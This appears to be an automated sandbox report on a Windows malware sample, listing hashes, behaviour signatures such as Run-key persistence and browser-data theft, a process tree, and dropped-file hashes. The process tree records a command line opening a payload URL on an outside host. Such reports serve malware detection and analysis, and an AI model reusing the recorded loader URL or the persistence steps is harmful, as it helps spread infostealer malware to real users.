Analysis
-
max time kernel
141s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
-
submitted
09/10/2023, 18:31
General
-
Target
b40a04669a4e05ba866a4be6a206057734e0e4aa01ae8270666809e0121be35e.exe
-
Size
12KB
-
MD5
65e6819a5a7dc1662e7d870a66d0b850
-
SHA1
76b138e4acedf5f96ae95de0024a696f00808e76
-
SHA256
b40a04669a4e05ba866a4be6a206057734e0e4aa01ae8270666809e0121be35e
-
SHA512
6052362b4fe41c608f131f06ebd50e3ff0561a7c53a064abf20364e21d2e775287b0db549bb5d1e96027f64b57b490b8a90b26cd8556c99920084607102c1bd9
-
SSDEEP
192:FmS1Xdn5wLpYXQEuS7wyEPQO0llY3Dvz0EoNH6TnF5+unv:JvnuVYgvYOr3boEiH0o8v
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 36 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\b40a04669a4e05ba866a4be6a206057734e0e4aa01ae8270666809e0121be35e.exe"C:\Users\Admin\AppData\Local\Temp\b40a04669a4e05ba866a4be6a206057734e0e4aa01ae8270666809e0121be35e.exe"1⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\spoolsv.exe"C:\Windows\spoolsv.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://onsapay.com/loader3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2324 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
344B
MD5ac0c3682b80a06cc8e123cf1e40a0257
SHA1aca39ea0530563f24df8f87ca9e3aba1fb743f8c
SHA2568febdb4c3872931a7f4b04fd7f1462fdf842fc2d8a64752ca50e23036d07bf82
SHA51255d22069f3390f04a7646bcfce23d5f678694527ea339a247d3557fd09002b2b31fe46a709323ae55d90b70c0091621e3a004118adaa55efe0e1952990d357c9
-
Filesize
344B
MD5fc2fa4e9993823b3656107899b4f1af3
SHA13bc9daec312c6d2feb6eae31d92f1a9feb4b4f0c
SHA256f7692f1c726d500a9ecef499d3817a127625276d06f86047163f25bce0775036
SHA51254a9424752dc3eee0c6d443166da3e8510c5082dfde9b4f9b521dfe63c63e3316654280cb0e5701ff66cf8c89049c9f4d1bc2de05e9d0a18a02e7937834db19b
-
Filesize
344B
MD51181c4cdc069fe4788ba33f66a0170f5
SHA1a77b53f99a3fc46827c657ecbb911e43e980fa00
SHA256dba616550e5c0725a7966551b95ec0c26261157984eb2ce405d1d062fd6f4509
SHA51258c5af036e817d7d696acbd77b768bb3acf9d89c47f69bfdcb92aeca42f4b17f71b937ac3f67334e44af8ea867e63714a7041142b3323856ee9327921ddaeba1
-
Filesize
344B
MD53b83c0dcd6ad4c36f515daedbb680de5
SHA1bd55ef6cf6644bc4d86fb34809dea1e7e1827f77
SHA2565ae84232ca8f07a35a516cc51e2a3d0deb282c213759080be454d277e3d3679a
SHA51218ed4492d61bca3517c4eb8b38a868cf7b96da4fbe12859e28b0346b56a8cae3e09f8efd7125e876574ddd6422aac690cd5277ac0d5743f7cd752be4f667b3e1
-
Filesize
344B
MD53afa0a67dbce29770d22931edb0a3bd5
SHA1cbd2289283ae86344eaf249001ef0f9ba30fcc42
SHA256f34849545bd188389e28b0531ac118015fe40caa08e0e42cf3c8e235315c26e8
SHA512beb173180e9b753e9b0ad5584361ef69167a27023ea4c59a317510cbc52f3f3d8cb2b4c181783a507177c905d769a081cd9f0c8a08089ff63c2e9ca31d2c67b7
-
Filesize
344B
MD5c5735d8e49e7f0a40c9b068fea934b0c
SHA13cbd9101371bce44b69890f57242eedf0b1991dc
SHA256ee5b39e884df67ec218e03959eac1fced68aa0dfebf2059dcbb389c9f29770aa
SHA5129d5fe42957cfeb95683807e19482a9c9da22223f1928b19aeef5cf1d574351d74aaf8534b84b96c21a86a4f1bb91ec56d806e0d3abab5beb0e5b25c40f5c3ba4
-
Filesize
344B
MD50a759ba3a9b6a04b1e9743a11fbb541b
SHA194419cedc59a4c4b7a1a3121b1e317de77a7ebe4
SHA25614be02d50e25037da4da951ddc922b3a6deda3c13c7f446522fc6bf978e95b0a
SHA5124e305772789e666625a55356367fb50dc872587273f8d0ccbe4800d3872558280e81947d5ccef357a309da03485c17726c5eee049222d7b20abb9ade3e0605c6
-
Filesize
344B
MD54c0c8997069f50f4dc8b83af0e431436
SHA1389539e85afa835fab31eeca5b8a6703e610196c
SHA2567897e285de3b8b78fe25ebfd80ef1a6ab893ae2b0e28d3ba1377770780e83f66
SHA512cc724271c8fe602d4776258d5a48365b3193448d3458bcf09f190ccd9b6401618ca568055ed9eaefddfb1643d2cb3f9309c1391cb3452ca5ddc031dac99066e9
-
Filesize
344B
MD54f13106fa6356be9b8ee370bf491d33a
SHA10c0d00d18e6f4de44555832d25a76f5015d81c2c
SHA256ef8e54782edb25b53042a9398a31086eb86c0d577f4df327d08a14d035408159
SHA5129ea46ee0cfde8ed8b8b7f2f879dcf70ec8310a9ca74939b8dd5dd6b5976223cbb16aca77bcb456e796f623d5d37d6e232599d3eebc757721825f00e467431d2d
-
Filesize
344B
MD5b486cb91272278920d7f7cf8f935b902
SHA1c35d205e2fd713c698361e1e67da4bc08e41eb26
SHA25643df4c4a6b02841be09bd9331599769e40806076fffe250837b8142f1c960078
SHA5126e7ffddc558747165fc7373fe0a3f64b601b8c0ac0601c06e30c8a58b671b9dbf25c78ff3b5ba1a563731e53e977cc923c9705a73cf1112bb79acffe38beb5fd
-
Filesize
344B
MD5e9f320ed5c17a2747219008e5e16d44b
SHA1dac1eb2fdf08b4e98c4af51395046dd54bb25bcd
SHA256f30dceb8bcd62db88cd7b9d6d508b9dd17d18866151cbcd0fe3aeedd42ebf1ff
SHA512b6270efcf73ed04260a2b08892bfda786fb02ec7d0bad49b93703236cfb268c2a6f3fc4438d802548ac967ee2d3ada1a17df72f05e91d147748f5e4acd18cc4f
-
Filesize
344B
MD54c38fa7f5c6e3e83cd5d9a34dfe44456
SHA10e9fe8947161778d1dd9a4549d94b284fc346172
SHA2569ff41a6f3d01beab7055aebf6fa8cc929d3776056d7f96e587c4798b7c6ebd49
SHA512df4113beecb286fd16b6d62a4d38d4f63b6110cb2b59c0c4d1e13375da1d4c71d787cd50f37efda866d4c9c3f3bce5709b5e8349a6a31a08f63e2f767eb797e8
-
Filesize
344B
MD5856da9b1faa426e36aa440b97f4c9b21
SHA1e264263ea937e3ffec692ee4418e9043425b794e
SHA2567e75d0e9707cc470990a7438da2c80728d92fa591714700e0a99bb945e685cf2
SHA512d651dbc547cdaaa8a5e1d21ec5fa3b6b1e4dbd4dbb8cacae6a30021f038f394d22f1e3efe83a6ed313d23b083d56454d0a9bfacba1c43a4cf043f6167460d85d
-
Filesize
344B
MD54e0b067dcd3e6c08c858a8ab578cd598
SHA15aeca14591710b252cc18541d0c815961899424e
SHA2563f31dbe51ed3ea1e87ecaa161908d85efda7abbba7b54fec26a844ac3f660fc0
SHA5127dc29ce559731708fe842c5b58be132adabf683b0a8387e758fcb4b85be6320182e2975ba4b3a451408ca972086f2c425ead382e420beea8d97964b86d2e82a3
-
Filesize
344B
MD53a2387b9bd54ba9d1f137cef10d6b76e
SHA119f3ff16a35952bca73e5511f111537dfad24e07
SHA2562df0310d73637e7dfbb77c8efee86ba7e5aea2412030ee229e87d188130553d6
SHA51276f0821dc0ccd8baf7b1c39708ad186ba4a698b231eceb0294bfb09aae1ee71fa27ed35342bdf1a3483dee38af94cd12a937b57f66c2b074ded6766cbd9b40ad
-
Filesize
344B
MD575f66a27d3b3e368fa1f72027fe68d98
SHA13110f5eadd44787ef4a87e33072fd0b31660ae66
SHA25693fe5ea75f81b034d7028acf31bf0eb438c0da9aafcadf9c9b26986c9dd93bbf
SHA5124b30e1206dd7e0c945dfb1ac151b5cc45b146ad719a73ff02e598c7f3250a9e3a747009f53e0eb969c090be259d8fd5889ecc41ba93d779067f787b7df7c281f
-
Filesize
344B
MD5dfc4588c8f25d887acc2fb067b9cba0d
SHA1a9d1be667893802cc7680537ccde295c8e84205e
SHA2561fef083a08e264c8874fd550a46b72317abe35f3296dd94111c403d66143b4da
SHA5129bcd99601b4d49f7d495aa185cb5115da8e9853606d310b888cfe77527659ba5c3530983a938f26786da9d301461521908a78846dc8e870d97b93944c5901bd4
-
Filesize
344B
MD599477674a477f1d66a9087151f7520e8
SHA12474f454faa8a1cad1abb94a59322b0959d299cb
SHA25684feef29127fe330dc43466d767fda6c821fb5e234d3e860866fad7b8d0439a9
SHA512773e4051a535ea5f67d41a06b8caefe1f06363333e1e2c501943423334983d31a2a8536f17a73607033d0793b3bf2aa834305f86893b54e814e7320078038636
-
Filesize
344B
MD5be30bf5f0f1190609a4f293e221f49f4
SHA1bb3eafa3cfe2031ef7581fc191756d52c128ed04
SHA256aedc894add8c72dab5d665ee019fcb3b086acc29e6b1741ccce7c0e010892413
SHA5128682b4fec82528f498a93cbedf1427ce416ad4755b322a981399b67e1afb3b8424f797bbfb75a88d5811d3ed243438e739b92dd1967ad6c92c2ab8e3740b130b
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
Filesize
12KB
MD5197feba560acbd5d577a2791026868ab
SHA1da4a8ca9ed96356d5fdba6743402a86be837d87b
SHA2562bc5df06b97356f87e0512659851b876003cd52df7a6a96be67ad533ee317f53
SHA51282ecffa498b7f87d2c1966383ba2e2a23b4e66d849f8bc372ede301af2421746496f3d930b213916355f324a0cc9feb47ca8f99caf62c81575e78bc727c165ec
-
Filesize
12KB
MD5197feba560acbd5d577a2791026868ab
SHA1da4a8ca9ed96356d5fdba6743402a86be837d87b
SHA2562bc5df06b97356f87e0512659851b876003cd52df7a6a96be67ad533ee317f53
SHA51282ecffa498b7f87d2c1966383ba2e2a23b4e66d849f8bc372ede301af2421746496f3d930b213916355f324a0cc9feb47ca8f99caf62c81575e78bc727c165ec
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
SHA1725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA5127608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf
-
Filesize
12KB
MD53d75b4de2c3edf60e7b79956d9afe7bb
SHA1e200151ab4f14fca54117393486a11af2a1e2e0d
SHA256e8b980ce74edd835672f209d6e78afa40d2ed9b1fef606e02b17e55095d4c5e0
SHA5123fd6ee7b99a568feb634cb18df71a692ecf13b73a986388cf655d2e50f4a6e0a0bb890b46b84eaa39276799bbdcf50874a5769cb1a5a99fb72390f3caba23d27
-
Filesize
12KB
MD53d75b4de2c3edf60e7b79956d9afe7bb
SHA1e200151ab4f14fca54117393486a11af2a1e2e0d
SHA256e8b980ce74edd835672f209d6e78afa40d2ed9b1fef606e02b17e55095d4c5e0
SHA5123fd6ee7b99a568feb634cb18df71a692ecf13b73a986388cf655d2e50f4a6e0a0bb890b46b84eaa39276799bbdcf50874a5769cb1a5a99fb72390f3caba23d27